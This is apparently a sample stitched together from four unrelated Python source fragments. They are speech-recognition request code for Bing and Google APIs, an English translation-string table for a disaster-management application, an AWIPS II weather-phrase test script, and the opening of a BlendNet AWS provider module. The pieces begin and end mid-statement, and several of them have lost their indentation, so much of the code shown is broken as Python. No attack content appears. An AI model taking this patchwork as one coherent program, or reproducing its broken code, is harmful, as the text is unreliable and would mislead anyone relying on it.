            credential_request = Request(credential_url, data = urlencode({
                "grant_type": "client_credentials",
                "client_id": "python",
                "client_secret": key,
                "scope": "https://speech.platform.bing.com"
            }).encode("utf-8"))
            if allow_caching:
                # record the request time BEFORE the network call so the cached
                # expiry is conservative (token can only expire earlier, never later)
                start_time = monotonic()
            try:
                credential_response = urlopen(credential_request)
            except HTTPError as e:
                raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
            except URLError as e:
                raise RequestError("recognition connection failed: {0}".format(e.reason))
            credential_text = credential_response.read().decode("utf-8")
            credentials = json.loads(credential_text)
            access_token, expiry_seconds = credentials["access_token"], float(credentials["expires_in"])
            if allow_caching:
                # save the token for the duration it is valid for
                self.bing_cached_access_token = access_token
                self.bing_cached_access_token_expiry = start_time + expiry_seconds
        wav_data = audio_data.get_wav_data(
            convert_rate = 16000, # audio samples must be 8kHz or 16 kHz
            convert_width = 2 # audio samples should be 16-bit
        )
        # build the recognition request URL; the random "requestid"/"instanceid"
        # UUIDs are required by the API for each request
        url = "https://speech.platform.bing.com/recognize/query?{0}".format(urlencode({
            "version": "3.0",
            "requestid": uuid.uuid4(),
            "appID": "D4D52672-91D7-4C74-8AD8-42B1D98141A5",
            "format": "json",
            "locale": language,
            "device.os": "wp7",
            "scenarios": "ulm",
            "instanceid": uuid.uuid4(),
            "result.profanitymarkup": "0",
        }))
        request = Request(url, data = wav_data, headers = {
            "Authorization": "Bearer {0}".format(access_token),
            "Content-Type": "audio/wav; samplerate=16000; sourcerate={0}; trustsourcerate=true".format(audio_data.sample_rate),
        })
        try:
            response = urlopen(request)
        except HTTPError as e:
            raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
        except URLError as e:
            raise RequestError("recognition connection failed: {0}".format(e.reason))
        response_text = response.read().decode("utf-8")
        result = json.loads(response_text)
        # return results
        if show_all: return result
        if "header" not in result or "lexical" not in result["header"]: raise UnknownValueError()
        return result["header"]["lexical"]
def recognize_google(self,audio_data, key = None, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Speech Recognition API.
The Google Speech Recognition API key is specified by ``key``. If not specified, it uses a generic key that works out of the box. This should generally be used for personal or testing purposes only, as it **may be revoked by Google at any time**.
To obtain your own API key, simply following the steps on the `API Keys <http://www.chromium.org/developers/how-tos/api-keys>`__ page at the Chromium Developers site. In the Google Developers Console, Google Speech Recognition is listed as "Speech API".
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in this `StackOverflow answer <http://stackoverflow.com/a/14302134>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
assert isinstance(audio_data, AudioData), "`audio_data` must be audio data"
assert key is None or isinstance(key, str), "`key` must be `None` or a string"
assert isinstance(language, str), "`language` must be a string"
#module uses flac by default, which attempts to open a subprocess which fails on Heroku
#modified this function to use a wav file instead, which Google apparently supports
flac_data = audio_data.get_wav_data(
convert_rate = 16000, # audio samples must be at least 8 kHz
convert_width = 2 # audio samples must be 16-bit
)
#we're using the Google Chromium Speech APIv2 which has been deprecated in favor of the Google Cloud Speech API
#this API is meant for devs, and has a wonky process to enable which involves joining a Google Group
if key is None: key = "<KEY>"
url = "http://www.google.com/speech-api/v2/recognize?{0}".format(urlencode({
"client": "chromium",
"lang": language,
"key": key,
}))
#changed header parameters for wav file
request = Request(url, data = flac_data, headers = {"Content-Type": "audio/l16; rate=16000"})
# obtain audio transcription results
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
#.
# ignore any blank blocks
actual_result = []
for line in response_text.split("\n"):
if not line: continue
result = json.loads(line)["result"]
if len(result) != 0:
actual_result = result[0]
break
# return results
if show_all: return actual_result
if "alternative" not in actual_result: raise UnknownValueError()
for entry in actual_result["alternative"]:
if "transcript" in entry:
return entry["transcript"]
raise UnknownValueError() # no transcriptions available
def recognize_wit(self, audio_data, key, show_all = False):
"""
Performs speech recognition | |
'Candidate Matches for Body %s',
'Canned Fish': 'Canned Fish',
'Cannot be empty': 'Cannot be empty',
'Cannot disable your own account!': 'Cannot disable your own account!',
'Capacity (Max Persons)': 'Capacity (Max Persons)',
'Capture Information on Disaster Victim groups (Tourists, Passengers, Families, etc.)': 'Capture Information on Disaster Victim groups (Tourists, Passengers, Families, etc.)',
'Capture Information on each disaster victim': 'Capture Information on each disaster victim',
'Capturing the projects each organization is providing and where': 'Capturing the projects each organisation is providing and where',
'Cardiology': 'Cardiology',
'Cassava': 'Cassava',
'Casual Labor': 'Casual Labor',
'Casualties': 'Casualties',
'Catalog': 'Catalogue',
'Catalog Details': 'Catalogue Details',
'Catalog Item added': 'Catalogue Item added',
'Catalog Item deleted': 'Catalogue Item deleted',
'Catalog Item updated': 'Catalogue Item updated',
'Catalog Items': 'Catalogue Items',
'Catalog added': 'Catalogue added',
'Catalog deleted': 'Catalogue deleted',
'Catalog updated': 'Catalogue updated',
'Catalogs': 'Catalogues',
'Categories': 'Categories',
'Category': 'Category',
"Caution: doesn't respect the framework rules!": "Caution: doesn't respect the framework rules!",
'Ceilings, light fixtures': 'Ceilings, light fixtures',
'Cell Phone': 'Cell Phone',
'Central point to record details on People': 'Central point to record details on People',
'Certificate': 'Certificate',
'Certificate Catalog': 'Certificate Catalogue',
'Certificate Details': 'Certificate Details',
'Certificate Status': 'Certificate Status',
'Certificate added': 'Certificate added',
'Certificate deleted': 'Certificate deleted',
'Certificate updated': 'Certificate updated',
'Certificates': 'Certificates',
'Certification': 'Certification',
'Certification Details': 'Certification Details',
'Certification added': 'Certification added',
'Certification deleted': 'Certification deleted',
'Certification updated': 'Certification updated',
'Certifications': 'Certifications',
'Certifying Organization': 'Certifying Organisation',
'Change Password': '<PASSWORD> Password',
'Check': 'Check',
'Check Request': 'Check Request',
'Check for errors in the URL, maybe the address was mistyped.': 'Check for errors in the URL, maybe the address was mistyped.',
'Check if the URL is pointing to a directory instead of a webpage.': 'Check if the URL is pointing to a directory instead of a webpage.',
'Check outbox for the message status': 'Check outbox for the message status',
'Check to delete': 'Check to delete',
'Check to delete:': 'Check to delete:',
'Check-in at Facility': 'Check-in at Facility',
'Checked': 'Checked',
'Checklist': 'Checklist',
'Checklist created': 'Checklist created',
'Checklist deleted': 'Checklist deleted',
'Checklist of Operations': 'Checklist of Operations',
'Checklist updated': 'Checklist updated',
'Chemical Hazard': 'Chemical Hazard',
'Chemical, Biological, Radiological, Nuclear or High-Yield Explosive threat or attack': 'Chemical, Biological, Radiological, Nuclear or High-Yield Explosive threat or attack',
'Chicken': 'Chicken',
'Child': 'Child',
'Child (2-11)': 'Child (2-11)',
'Child (< 18 yrs)': 'Child (< 18 yrs)',
'Child Abduction Emergency': 'Child Abduction Emergency',
'Child headed households (<18 yrs)': 'Child headed households (<18 yrs)',
'Children (2-5 years)': 'Children (2-5 years)',
'Children (5-15 years)': 'Children (5-15 years)',
'Children (< 2 years)': 'Children (< 2 years)',
'Children in adult prisons': 'Children in adult prisons',
'Children in boarding schools': 'Children in boarding schools',
'Children in homes for disabled children': 'Children in homes for disabled children',
'Children in juvenile detention': 'Children in juvenile detention',
'Children in orphanages': 'Children in orphanages',
'Children living on their own (without adults)': 'Children living on their own (without adults)',
'Children not enrolled in new school': 'Children not enrolled in new school',
'Children orphaned by the disaster': 'Children orphaned by the disaster',
'Children separated from their parents/caregivers': 'Children separated from their parents/caregivers',
'Children that have been sent to safe places': 'Children that have been sent to safe places',
'Children who have disappeared since the disaster': 'Children who have disappeared since the disaster',
'Chinese (Simplified)': 'Chinese (Simplified)',
'Chinese (Traditional)': 'Chinese (Traditional)',
'Cholera Treatment': 'Cholera Treatment',
'Cholera Treatment Capability': 'Cholera Treatment Capability',
'Cholera Treatment Center': 'Cholera Treatment Center',
'Cholera-Treatment-Center': 'Cholera-Treatment-Center',
'Choose a new posting based on the new evaluation and team judgement. Severe conditions affecting the whole building are grounds for an UNSAFE posting. Localised Severe and overall Moderate conditions may require a RESTRICTED USE. Place INSPECTED placard at main entrance. Post all other placards at every significant entrance.': 'Choose a new posting based on the new evaluation and team judgement. Severe conditions affecting the whole building are grounds for an UNSAFE posting. Localised Severe and overall Moderate conditions may require a RESTRICTED USE. Place INSPECTED placard at main entrance. Post all other placards at every significant entrance.',
'Christian': 'Christian',
'Church': 'Church',
'City': 'City',
'Civil Emergency': 'Civil Emergency',
'Cladding, glazing': 'Cladding, glazing',
'Click on the link': 'Click on the link',
'Client IP': 'Client IP',
'Climate': 'Climate',
'Clinical Laboratory': 'Clinical Laboratory',
'Clinical Operations': 'Clinical Operations',
'Clinical Status': 'Clinical Status',
'Close map': 'Close map',
'Closed': 'Closed',
'Clothing': 'Clothing',
'Cluster': 'Cluster',
'Cluster Details': 'Cluster Details',
'Cluster Distance': 'Cluster Distance',
'Cluster Subsector': 'Cluster Subsector',
'Cluster Subsector Details': 'Cluster Subsector Details',
'Cluster Subsector added': 'Cluster Subsector added',
'Cluster Subsector deleted': 'Cluster Subsector deleted',
'Cluster Subsector updated': 'Cluster Subsector updated',
'Cluster Subsectors': 'Cluster Subsectors',
'Cluster Threshold': 'Cluster Threshold',
'Cluster added': 'Cluster added',
'Cluster deleted': 'Cluster deleted',
'Cluster updated': 'Cluster updated',
'Cluster(s)': 'Cluster(s)',
'Clusters': 'Clusters',
'Code': 'Code',
'Cold Wave': 'Cold Wave',
'Collapse, partial collapse, off foundation': 'Collapse, partial collapse, off foundation',
'Collective center': 'Collective center',
'Color for Underline of Subheadings': 'Colour for Underline of Subheadings',
'Color of Buttons when hovering': 'Colour of Buttons when hovering',
'Color of bottom of Buttons when not pressed': 'Colour of bottom of Buttons when not pressed',
'Color of bottom of Buttons when pressed': 'Colour of bottom of Buttons when pressed',
'Color of dropdown menus': 'Colour of dropdown menus',
'Color of selected Input fields': 'Colour of selected Input fields',
'Color of selected menu items': 'Colour of selected menu items',
'Columns, pilasters, corbels': 'Columns, pilasters, corbels',
'Combined Method': 'Combined Method',
'Come back later.': 'Come back later.',
'Come back later. Everyone visiting this site is probably experiencing the same problem as you.': 'Come back later. Everyone visiting this site is probably experiencing the same problem as you.',
'Comments': 'Comments',
'Commercial/Offices': 'Commercial/Offices',
'Commit': 'Commit',
'Commit Date': 'Commit Date',
'Commit from %s': 'Commit from %s',
'Commit. Status': 'Commit. Status',
'Commiting a changed spreadsheet to the database': 'Committing a changed spreadsheet to the database',
'Commitment': 'Commitment',
'Commitment Added': 'Commitment Added',
'Commitment Canceled': 'Commitment Canceled',
'Commitment Details': 'Commitment Details',
'Commitment Item Details': 'Commitment Item Details',
'Commitment Item added': 'Commitment Item added',
'Commitment Item deleted': 'Commitment Item deleted',
'Commitment Item updated': 'Commitment Item updated',
'Commitment Items': 'Commitment Items',
'Commitment Status': 'Commitment Status',
'Commitment Updated': 'Commitment Updated',
'Commitments': 'Commitments',
'Committed': 'Committed',
'Committed By': 'Committed By',
'Committed People': 'Committed People',
'Committed Person Details': 'Committed Person Details',
'Committed Person updated': 'Committed Person updated',
'Committing Inventory': 'Committing Inventory',
'Committing Organization': 'Committing Organisation',
'Committing Person': 'Committing Person',
'Communication problems': 'Communication problems',
'Community Centre': 'Community Centre',
'Community Health Center': 'Community Health Center',
'Community Member': 'Community Member',
'Competency': 'Competency',
'Competency Rating Catalog': 'Competency Rating Catalogue',
'Competency Rating Details': 'Competency Rating Details',
'Competency Rating added': 'Competency Rating added',
'Competency Rating deleted': 'Competency Rating deleted',
'Competency Rating updated': 'Competency Rating updated',
'Competency Ratings': 'Competency Ratings',
'Complete': 'Complete',
'Complete a new Assessment': 'Complete a new Assessment',
'Completed': 'Completed',
'Completed Assessment': 'Completed Assessment',
'Completed Assessment Details': 'Completed Assessment Details',
'Completed Assessment added': 'Completed Assessment added',
'Completed Assessment deleted': 'Completed Assessment deleted',
'Completed Assessment updated': 'Completed Assessment updated',
'Completed Assessments': 'Completed Assessments',
'Completed surveys of this Series:': 'Completed surveys of this Series:',
'Complexion': 'Complexion',
'Compose': 'Compose',
'Compromised': 'Compromised',
'Concrete frame': 'Concrete frame',
'Concrete shear wall': 'Concrete shear wall',
'Condition': 'Condition',
'Configuration': 'Configuration',
'Configurations': 'Configurations',
'Configure Run-time Settings': 'Configure Run-time Settings',
'Configure connection details and authentication': 'Configure connection details and authentication',
'Configure resources to synchronize, update methods and policies': 'Configure resources to synchronise, update methods and policies',
'Configure the default proxy server to connect to remote repositories': 'Configure the default proxy server to connect to remote repositories',
'Confirm Shipment Received': 'Confirm Shipment Received',
'Confirmed': 'Confirmed',
'Confirming Organization': 'Confirming Organisation',
'Conflict Policy': 'Conflict Policy',
'Conflict policy': 'Conflict policy',
'Conflicts': 'Conflicts',
'Consignment Note': 'Consignment Note',
'Constraints Only': 'Constraints Only',
'Consumable': 'Consumable',
'Contact': 'Contact',
'Contact Data': 'Contact Data',
'Contact Details': 'Contact Details',
'Contact Info': 'Contact Info',
'Contact Information': 'Contact Information',
'Contact Information Added': 'Contact Information Added',
'Contact Information Deleted': 'Contact Information Deleted',
'Contact Information Updated': 'Contact Information Updated',
'Contact Method': 'Contact Method',
'Contact Name': 'Contact Name',
'Contact Person': 'Contact Person',
'Contact Phone': 'Contact Phone',
'Contact information added': 'Contact information added',
'Contact information deleted': 'Contact information deleted',
'Contact information updated': 'Contact information updated',
'Contact us': 'Contact us',
'Contacts': 'Contacts',
'Contents': 'Contents',
'Contributor': 'Contributor',
'Conversion Tool': 'Conversion Tool',
'Cooking NFIs': 'Cooking NFIs',
'Cooking Oil': 'Cooking Oil',
'Coordinate Conversion': 'Coordinate Conversion',
'Coping Activities': 'Coping Activities',
'Copy': 'Copy',
'Corn': 'Corn',
'Cost Type': 'Cost Type',
'Cost per Megabyte': 'Cost per Megabyte',
'Cost per Minute': 'Cost per Minute',
'Country': 'Country',
'Country is required!': 'Country is required!',
'Country of Residence': 'Country of Residence',
'County': 'County',
'Course': 'Course',
'Course Catalog': 'Course Catalogue',
'Course Certificate Details': 'Course Certificate Details',
'Course Certificate added': 'Course Certificate added',
'Course Certificate deleted': 'Course Certificate deleted',
'Course Certificate updated': 'Course Certificate updated',
'Course Certificates': 'Course Certificates',
'Course Details': 'Course Details',
'Course added': 'Course added',
'Course deleted': 'Course deleted',
'Course updated': 'Course updated',
'Courses': 'Courses',
'Create & manage Distribution groups to receive Alerts': 'Create & manage Distribution groups to receive Alerts',
'Create Checklist': 'Create Checklist',
'Create Group Entry': 'Create Group Entry',
'Create Impact Assessment': 'Create Impact Assessment',
'Create Mobile Impact Assessment': 'Create Mobile Impact Assessment',
'Create New Asset': 'Create New Asset',
'Create New Catalog': 'Create New Catalogue',
'Create New Catalog Item': 'Create New Catalogue Item',
'Create New Event': 'Create New Event',
'Create New Item': 'Create New Item',
'Create New Item Category': 'Create New Item Category',
'Create New Location': 'Create New Location',
'Create New Request': 'Create New Request',
'Create New Scenario': 'Create New Scenario',
'Create New Vehicle': 'Create New Vehicle',
'Create Rapid Assessment': 'Create Rapid Assessment',
'Create Request': | |
<gh_stars>0
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: <NAME>
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
# This software is in the public domain, furnished "as is", without technical
# support, and with no warranty, express or implied, as to its usefulness for
# any purpose.
#
# RoutineLevel5_4_TestScript
# Author:
# ----------------------------------------------------------------------------
# Temp phrase
# Sky trends with new Sky categories
addPeriods = """
def _10_503_issuance_list(self, argDict):
seriesDefAM = [
("Period_1", "period1"), #("Phantom", 12),
("Period_2_3", 12), ("Period_2_3", 12),
("Period_4_5", 12), ("Period_4_5", 12),
("Period_6_14", 12), #("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
## ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
]
seriesDefPM = [
("Period_1", "period1"),
("Period_2_3", 12), ("Period_2_3", 12),
("Period_4_5", 12), ("Period_4_5", 12),
("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
("Period_6_14", 12),
]
return [
("Morning", self.DAY(), self.NIGHT(), self.NIGHT(),
".TODAY...", "early in the morning", "late in the afternoon",
1, seriesDefAM),
("Morning with Pre-1st Period", self.DAY()-2, self.NIGHT(), self.NIGHT(),
".TODAY...", "early in the morning", "late in the afternoon",
1, seriesDefAM),
("Morning Update", "issuanceHour", self.NIGHT(), self.NIGHT(),
".REST OF TODAY...", "early in the morning", "late in the afternoon",
1, seriesDefAM),
("Afternoon Update", "issuanceHour", self.NIGHT(), self.NIGHT(),
".REST OF TODAY...", "early in the morning","late in the afternoon",
1, seriesDefAM),
# End times are tomorrow:
("Afternoon", self.NIGHT(), 24 + self.DAY(), 24 + self.DAY(),
".TONIGHT...", "late in the night", "early in the evening",
1, seriesDefPM),
("Afternoon with Pre-1st Period", self.NIGHT()-2, 24 + self.DAY(), 24 + self.DAY(),
".TONIGHT...", "late in the night", "early in the evening",
1, seriesDefPM),
("Evening Update", "issuanceHour", 24 + self.DAY(), 24 + self.DAY(),
".REST OF TONIGHT...", "early in the morning","early in the evening",
1, seriesDefPM),
# For the early morning update, this produces:
# Rest of Tonight:
# Monday
# Monday Night
("Early Morning Update", "issuanceHour", self.DAY(), self.DAY(),
".REST OF TONIGHT...", "early in the morning","late in the afternoon",
0, seriesDefPM),
# Alternative
# For the early morning update, this produces:
# Early This Morning:
# Today
# Tonight
#("Evening Update", "issuanceHour", 24 + self.DAY(), 24 + self.DAY(),
# ".REST OF TONIGHT...", "late in the night", "early in the evening",
# 1, seriesDefPM),
#("Early Morning Update", "issuanceHour", self.DAY(), self.DAY(),
# ".EARLY THIS MORNING...", "early in the morning", "late in the afternoon",
# 1, seriesDefPM),
]
"""
addTonight = """
def _10_503_issuance_list(self, argDict):
seriesDefAM = [
("Period_1", "period1"), #("Phantom", 12),
("Period_2_3", 12), #("Period_2_3", 12),
## ("Period_4_5", 12), ("Period_4_5", 12),
## ("Period_6_14", 12), #("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
## ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
]
seriesDefPM = [
("Period_1", "period1"),
("Period_2_3", 12), ("Period_2_3", 12),
("Period_4_5", 12), ("Period_4_5", 12),
("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12), ("Period_6_14", 12),
("Period_6_14", 12),
]
return [
("Morning", self.DAY(), self.NIGHT(), self.NIGHT(),
".TODAY...", "early in the morning", "late in the afternoon",
1, seriesDefAM),
("Morning with Pre-1st Period", self.DAY()-2, self.NIGHT(), self.NIGHT(),
".TODAY...", "early in the morning", "late in the afternoon",
1, seriesDefAM),
("Morning Update", "issuanceHour", self.NIGHT(), self.NIGHT(),
".REST OF TODAY...", "early in the morning", "late in the afternoon",
1, seriesDefAM),
("Afternoon Update", "issuanceHour", self.NIGHT(), self.NIGHT(),
".REST OF TODAY...", "early in the morning","late in the afternoon",
1, seriesDefAM),
# End times are tomorrow:
("Afternoon", self.NIGHT(), 24 + self.DAY(), 24 + self.DAY(),
".TONIGHT...", "late in the night", "early in the evening",
1, seriesDefPM),
("Afternoon with Pre-1st Period", self.NIGHT()-2, 24 + self.DAY(), 24 + self.DAY(),
".TONIGHT...", "late in the night", "early in the evening",
1, seriesDefPM),
("Evening Update", "issuanceHour", 24 + self.DAY(), 24 + self.DAY(),
".REST OF TONIGHT...", "early in the morning","early in the evening",
1, seriesDefPM),
# For the early morning update, this produces:
# Rest of Tonight:
# Monday
# Monday Night
("Early Morning Update", "issuanceHour", self.DAY(), self.DAY(),
".REST OF TONIGHT...", "early in the morning","late in the afternoon",
0, seriesDefPM),
# Alternative
# For the early morning update, this produces:
# Early This Morning:
# Today
# Tonight
#("Evening Update", "issuanceHour", 24 + self.DAY(), 24 + self.DAY(),
# ".REST OF TONIGHT...", "late in the night", "early in the evening",
# 1, seriesDefPM),
#("Early Morning Update", "issuanceHour", self.DAY(), self.DAY(),
# ".EARLY THIS MORNING...", "early in the morning", "late in the afternoon",
# 1, seriesDefPM),
]
def Period_2_3(self):
# No Lake Wind phrase
component = {
"type": "component",
"methodList": [
self.orderPhrases,
self.consolidateSubPhrases,
self.assemblePhrases,
self.wordWrap,
],
"analysisList": [
#("MinT", self.avg),
#("MaxT", self.avg),
("MinT", self.stdDevMinMax),
("MaxT", self.stdDevMinMax),
("T", self.hourlyTemp),
("T", self.minMax),
("Sky", self.median, [3]),
("PoP", self._PoP_analysisMethod("Period_2_3"), [6]),
("PoP", self.binnedPercent, [6]),
("SnowAmt", self.accumMinMax),
("StormTotalSnow", self.accumMinMax),
("IceAccum", self.accumMinMax),
("SnowLevel", self.avg),
("Wind", self.vectorMedianRange, [6]),
("Wind", self.vectorMinMax, [6]),
("WindGust", self.maximum, [6]),
("Wx", self.rankedWx, [6]),
("WindChill", self.minMax, [6]),
("HeatIndex", self.minMax, [6]),
],
"phraseList":[
self.wind_summary,
self.reportTrends,
self.sky_phrase,
self.skyPopWx_phrase,
self.weather_phrase,
self.severeWeather_phrase,
self.heavyPrecip_phrase,
self.visibility_phrase,
self.snow_phrase,
self.total_snow_phrase,
self.snowLevel_phrase,
self.iceAccumulation_phrase,
self.highs_phrase,
self.lows_phrase,
#self.highs_range_phrase,
#self.lows_range_phrase,
self.steady_temp_trends,
self.temp_trends,
self.wind_withGusts_phrase,
# self.lake_wind_phrase,
self.popMax_phrase,
self.windChill_phrase,
self.heatIndex_phrase,
],
}
if self._arealSkyAnalysis:
component["analysisList"].append(("Sky", self.binnedPercent, [6]))
if self._useStormTotalSnow:
phraseList = component["phraseList"]
index = phraseList.index(self.total_snow_phrase)
phraseList[index] = self.stormTotalSnow_phrase
component["phraseList"] = phraseList
return component
"""
import TestScript
scripts = [
### Temp phrases
{
"name": "Temp_50",
"commentary": """
MaxT -- 50
Steady temperatures.
""",
"productType": "Phrase_Test_Local",
"createGrids": [
("Fcst", "T", "SCALAR", 0, 3, 50, "all"),
("Fcst", "T", "SCALAR", 3, 6, 50, "all"),
("Fcst", "T", "SCALAR", 6, 9, 50, "all"),
("Fcst", "T", "SCALAR", 9, 12, 50, "all"),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 50, ["AboveElev"]),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 50, ["BelowElev"]),
],
"checkStrings": ["Near steady temperature around 50"],
},
{
"name": "Temp_38-42",
"commentary": """
MaxT -- 38-42
Implied range terminology. NEAR and AROUND are defined as plus or
minus two degrees about a certain number.
For example, Lows AROUND 40 means 38 to 42 inclusive.
""",
"productType": "Phrase_Test_Local",
"createGrids": [
("Fcst", "T", "SCALAR", 0, 3, 70, "all"),
("Fcst", "T", "SCALAR", 3, 6, 50, "all"),
("Fcst", "T", "SCALAR", 6, 9, 70, "all"),
("Fcst", "T", "SCALAR", 9, 12, 70, "all"),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 38, ["AboveElev"]),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 42, ["BelowElev"]),
],
"checkStrings": ["Highs around 40"],
},
{
"name": "Temp_50-53",
"commentary": """
MaxT -- 50-53
LOWER 50S (50, 51, 52, 53)
""",
"productType": "Phrase_Test_Local",
"createGrids": [
("Fcst", "T", "SCALAR", 0, 3, 70, "all"),
("Fcst", "T", "SCALAR", 3, 6, 50, "all"),
("Fcst", "T", "SCALAR", 6, 9, 70, "all"),
("Fcst", "T", "SCALAR", 9, 12, 70, "all"),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 50, ["AboveElev"]),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 53, ["BelowElev"]),
],
"checkStrings": ["Highs in the lower 50s"],
},
{
"name": "Temp_54-56",
"commentary": """
MaxT -- 54-56
MID 50S (54, 55, 56)
""",
"productType": "Phrase_Test_Local",
"createGrids": [
("Fcst", "T", "SCALAR", 0, 3, 70, "all"),
("Fcst", "T", "SCALAR", 3, 6, 50, "all"),
("Fcst", "T", "SCALAR", 6, 9, 70, "all"),
("Fcst", "T", "SCALAR", 9, 12, 70, "all"),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 54, ["AboveElev"]),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 56, ["BelowElev"]),
],
"checkStrings": ["Highs in the mid 50s"],
},
{
"name": "Temp_57-59",
"commentary": """
MaxT -- 57-59
UPPER 50S (57, 58, 59)
""",
"productType": "Phrase_Test_Local",
"createGrids": [
("Fcst", "T", "SCALAR", 0, 3, 70, "all"),
("Fcst", "T", "SCALAR", 3, 6, 50, "all"),
("Fcst", "T", "SCALAR", 6, 9, 70, "all"),
("Fcst", "T", "SCALAR", 9, 12, 70, "all"),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 57, ["AboveElev"]),
("Fcst", "MaxT", "SCALAR", "MaxTBegin", "MaxTEnd", 59, ["BelowElev"]),
],
"checkStrings": ["Highs in the upper 50s"],
},
{
"name": "Temp_47-52",
"commentary": """
MaxT -- 47-52
A specific range of five degrees (5 to 10 degrees in mountainous areas)
Lows 20 to 25
Highs 47 to 52
""",
"productType": "Phrase_Test_Local",
"createGrids": [
("Fcst", "T", "SCALAR", 0, 3, 70, "all"),
("Fcst", "T", "SCALAR", 3, 6, | |
<filename>BlendNet/providers/aws/__init__.py
'''Amazon Web Services
Provide API access to allocate required resources in AWS
Dependencies: aws cli v2 installed and configured auth
Help: https://github.com/state-of-the-art/BlendNet/wiki/HOWTO:-Setup-provider:-Amazon-Web-Services-(AWS)
'''
__all__ = [
'Processor',
'Manager',
'Agent',
'Instance',
]
# Exception to notify that the command returned exitcode != 0
# Exception to notify that the command returned exitcode != 0
class AwsToolException(Exception):
    """Raised when the `aws` CLI tool exits with a non-zero return code."""
    pass
import json
import os
import pathlib
import platform
import site
import ssl
import subprocess
import sys
import tempfile
import time
import urllib
import urllib.error
import urllib.request
METADATA_URL = 'http://169.254.169.254/latest/'  # EC2 instance metadata service
LOCATION = None # If the script is running in the cloud; None = not probed yet
AWS_CONF = {}  # provider settings (aws_tool_path, bucket_name, ...)
AWS_EXEC_PREFIX = None  # tuple prefixed to every aws CLI invocation
AWS_CONFIGS = None  # cached result of _getConfigs()
def _requestMetadata(path, verbose=False):
    '''Fetch METADATA_URL+path and return it as text, or None when unavailable.

    Retries while the metadata service answers 503 (service still starting).
    Any other failure (timeout, connection error, other HTTP error) returns
    None; the warning is printed only when verbose is True.
    '''
    req = urllib.request.Request(METADATA_URL + path)
    try:
        while True:
            try:
                with urllib.request.urlopen(req, timeout=2) as res:
                    data = res.read()
                    try:
                        return data.decode('utf-8')
                    except (LookupError, UnicodeDecodeError):
                        # UTF-8 not worked, so probably it's latin1
                        return data.decode('iso-8859-1')
            except urllib.error.HTTPError as e:
                # BUG FIX: urlopen() raises HTTPError for a 503 response, so
                # the original `res.getcode() == 503` retry branch was dead
                # code - the retry has to happen in the exception handler.
                if e.code != 503:
                    raise
                print('WARN: Unable to reach metadata serivce')
                time.sleep(5)
    except Exception:
        if verbose:
            print('WARN: Metadata is not available ' + path)
        return None
def checkLocation():
    '''Returns True if it's the AWS environment'''
    global LOCATION
    if LOCATION is None:
        # Probe once and cache: a reachable metadata service means we are
        # running on an AWS instance.
        LOCATION = _requestMetadata('', True) is not None
    return LOCATION
def _executeAwsTool(*args, data=None):
    '''Run the aws tool and return its output parsed as JSON.

    data, when provided, is sent to the process stdin as bytes.
    Returns None when the output is not valid JSON.
    Raises AwsToolException when the tool exits with a non-zero code.
    '''
    to_run = AWS_EXEC_PREFIX
    # 's3' subcommands do not accept '--region', so drop it from the prefix
    if args[0] == 's3' and '--region' in AWS_EXEC_PREFIX:
        to_run = to_run[:-2]
    result = subprocess.run(to_run + args,
                            input=data,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    if result.returncode != 0:
        # BUG FIX: report the command that was actually executed (to_run),
        # not the unmodified AWS_EXEC_PREFIX
        raise AwsToolException('AWS tool returned %d during execution of "%s": %s' % (
            result.returncode, to_run + args, result.stderr))
    # Use a separate name for the output: the original reused `data`, which
    # shadowed the stdin parameter and made the code harder to follow
    parsed = None
    try:
